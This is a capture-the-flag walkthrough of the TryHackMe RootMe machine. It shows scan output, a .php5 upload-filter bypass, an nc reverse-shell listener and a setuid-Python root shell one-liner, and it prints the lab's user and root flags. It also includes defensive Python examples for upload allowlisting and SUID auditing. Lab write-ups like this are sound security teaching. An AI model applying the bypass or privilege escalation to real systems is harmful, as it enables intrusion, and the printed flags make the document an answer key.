RootMe TryHackMe Writeup

In this walkthrough, we demonstrated how to exploit a vulnerable machine on TryHackMe. Starting with scanning for open ports, we identified key services running on the machine, such as SSH and Apache. By enumerating directories and uploading a PHP reverse shell, we gained access to the system. From there, we performed privilege escalation using a SUID binary, allowing us to gain root access and retrieve the root flag. This exercise showcases the importance of enumeration, exploiting common web application vulnerabilities, and leveraging misconfigurations like SUID permissions for privilege escalation.

Scan the Machine, How Many Ports Are Open?

We start by scanning the machine using Nmap to identify open ports. From the scan, we can see two open ports:

  • Port 22: SSH (Secure Shell)
  • Port 80: HTTP (Web Server)

Here’s the output from the Nmap scan:

$ nmap -sC -sV -A 10.10.112.113
Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-26 12:45 CEST
Nmap scan report for 10.10.112.113
Host is up (0.048s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Answer: 2 open ports

This shows that the machine is running an SSH service on port 22 and a web server (Apache) on port 80.

What Version of Apache is Running?

From the Nmap scan, we can see that Apache is running version 2.4.29. This is important because certain versions of Apache may have known vulnerabilities that we can exploit.

What Service is Running on Port 22?

Port 22 is open and running the SSH service, which is used for remote secure communication with the server. We can potentially use this for further exploitation once we gain the necessary credentials.

Find Directories on the Web Server Using GoBuster

Next, we enumerate directories on the web server using GoBuster. This tool helps to find hidden directories that aren’t immediately visible. After running it with the common wordlist, we discover two interesting directories: /panel and /uploads.

kali@kali:/data/RootMe$ gobuster dir -u http://10.10.112.113 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.112.113
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/11/26 12:52:48 Starting gobuster
===============================================================
/index.php (Status: 200)
/panel (Status: 301)
/uploads (Status: 301)
===============================================================
2024/11/26 12:53:33 Finished
===============================================================

Answer: /panel/ is a hidden directory.

The /panel directory is worth investigating further, as it may lead us to a login page or other vulnerabilities.

Getting a Reverse Shell

To gain a reverse shell, we attempt to upload a PHP file. Initially, the system blocks .php file uploads, but we find that uploading a .php5 file bypasses the filter. We upload a PHP reverse shell and set up a listener on our attacker machine:

nc -nlvp 4444
curl http://10.10.112.113/uploads/shell.php5

We get a connection back, and we now have a shell as the www-data user:

kali@kali:/data/RootMe/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.72.113] from (UNKNOWN) [10.10.112.113] 34592
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
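The reason the .php5 upload got through is visible in the filter's shape: it refuses one suffix instead of admitting a fixed set. The following is an added example, not code from the RootMe box or from TryHackMe; the denylist is a hypothetical reconstruction of the panel's check, set beside an allowlist that would have rejected shell.php5, with constructed sample filenames.

```python
"""Added example: a '.php'-only denylist (the weakness this writeup exploits with
.php5) next to an allowlist check that rejects it. The denylist is a hypothetical
reconstruction of the upload panel, not its real code."""
import os
import re
import secrets

# Constructed stand-in for the panel's check: only the literal ".php" suffix is refused.
def denylist_accepts(filename: str) -> bool:
    """True if the weak filter lets the upload through."""
    return not filename.lower().endswith(".php")

# Hardened check: one dot, a plain stem, and an extension from a fixed allowlist.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

def allowlist_accepts(filename: str) -> bool:
    """True only for a single-extension basename whose extension is allowlisted."""
    base = os.path.basename(filename)          # drop any directory component
    m = _NAME_RE.fullmatch(base)
    return m is not None and m.group(1).lower() in ALLOWED_EXTENSIONS

def stored_name(filename: str) -> str:
    """Server-chosen name for an accepted upload; the client never picks the stored path."""
    if not allowlist_accepts(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"

def compare(names):
    """Map each filename to (denylist verdict, allowlist verdict)."""
    return {n: (denylist_accepts(n), allowlist_accepts(n)) for n in names}

# Constructed sample names, including the .php5 name used in this writeup.
SAMPLE_NAMES = ["cat.png", "shell.php", "shell.php5", "shell.phtml",
                "shell.php.png", "../shell.php5"]

if __name__ == "__main__":
    for name, (weak, strong) in compare(SAMPLE_NAMES).items():
        weak_s = "accept" if weak else "reject"
        strong_s = "accept" if strong else "reject"
        print(f"{name:16} denylist={weak_s}  allowlist={strong_s}")
```

Even with the allowlist, the uploads directory should be served with script execution disabled, so that a name check is not the only control between an upload and code execution.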

Retrieve User Flag

After getting a shell, we navigate to /var/www to find the user flag:

$ cd /var/www
$ ls -la
total 20
drwxr-xr-x  3 www-data www-data 4096 Aug  4 17:54 .
drwxr-xr-x 14 root     root     4096 Aug  4 15:08 ..
-rw-------  1 www-data www-data  129 Aug  4 17:54 .bash_history
drwxr-xr-x  6 www-data www-data 4096 Aug  4 17:19 html
-rw-r--r--  1 www-data www-data   21 Aug  4 17:30 user.txt
$ cat user.txt
THM{y0u_g0t_a_sh3ll}

Answer: THM{y0u_g0t_a_sh3ll}

The user flag confirms we have gained access to the system as the www-data user.

Privilege Escalation

We now focus on escalating our privileges from the www-data user to root.

Searching for Files with SUID Permission

We search for files with the SUID (Set User ID) bit set, which can potentially allow us to run programs with elevated privileges. We find that /usr/bin/python is one such file:

bash-4.4$ find / -type f -user root -perm -u=s 2>/dev/null
/usr/bin/python

Answer: /usr/bin/python

This is a crucial finding. A SUID binary runs with the effective user ID of its owner rather than that of the user who launches it, so a setuid-root interpreter like this one hands root's privileges to anyone who can execute it.
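From the defender's side, the same search becomes an audit: list setuid-root files and compare them with what the distribution is expected to ship, so an interpreter stands out immediately. This is an added example, not part of the original writeup; the baseline and interpreter lists are constructed for illustration, and the sample records stand in for a live scan.

```python
"""Added example: audit setuid-root files (the writeup's find command) against a
baseline so that an unexpected binary such as /usr/bin/python is flagged.
Baseline, interpreter names and sample records are constructed, not from the box."""
import os
import stat

# Constructed baseline: setuid-root binaries a stock Ubuntu install is expected to carry.
EXPECTED_SUID_ROOT = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/mount", "/bin/umount",
}
# Programs that must never be setuid: they run arbitrary code for whoever executes them.
INTERPRETER_NAMES = {"python", "python2", "python3", "perl", "ruby", "php", "sh", "bash"}

def scan_suid_root(root="/"):
    """Yield (path, mode, uid) for regular files under root; lstat avoids following links."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                      # the 2>/dev/null of the writeup's find
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode, st.st_uid

def classify(entries):
    """Split setuid-root files into expected, unexpected and interpreter hits."""
    report = {"expected": [], "unexpected": [], "interpreters": []}
    for path, mode, uid in entries:
        if uid != 0 or not mode & stat.S_ISUID:
            continue                          # mirrors -user root -perm -u=s
        bucket = "expected" if path in EXPECTED_SUID_ROOT else "unexpected"
        report[bucket].append(path)
        base = os.path.basename(path)
        # strip a version suffix such as python3.6 -> python before matching
        if base in INTERPRETER_NAMES or base.rstrip("0123456789.") in INTERPRETER_NAMES:
            report["interpreters"].append(path)
    return report

# Constructed stat records standing in for a real scan; /usr/bin/python is this box's finding.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/python", 0o104755, 0),
    ("/usr/bin/vim.basic", 0o100755, 0),      # root-owned but not setuid
    ("/home/user/tool", 0o104755, 1000),      # setuid but not root-owned
]

if __name__ == "__main__":
    print(classify(SAMPLE_ENTRIES))   # on a live host: classify(scan_suid_root())
```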

Escalating Privileges Using Python

We can leverage Python to escalate our privileges. Because the interpreter itself is setuid root, we use it to replace the process with a shell. The -p flag tells the shell to keep the elevated effective UID instead of dropping back to the real UID, which is why the id output shows euid=0(root):

bash-4.4$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

At this point, we have successfully escalated our privileges to root.

Getting the Root Flag

Finally, we navigate to the /root directory, where the root flag is located:

# cd /root
# ls -la
total 40
drwx------  6 root root 4096 Aug  4 17:54 .
drwxr-xr-x 24 root root 4096 Aug  4 14:54 ..
-rw-------  1 root root 1423 Aug  4 17:54 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Aug  4 17:08 .cache
drwx------  3 root root 4096 Aug  4 17:08 .gnupg
drwxr-xr-x  3 root root 4096 Aug  4 16:26 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Aug  4 15:03 .ssh
-rw-r--r--  1 root root   26 Aug  4 17:31 root.txt
# cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}

Answer: THM{pr1v1l3g3_3sc4l4t10n}

We have successfully captured the root flag, completing the RootMe TryHackMe machine.
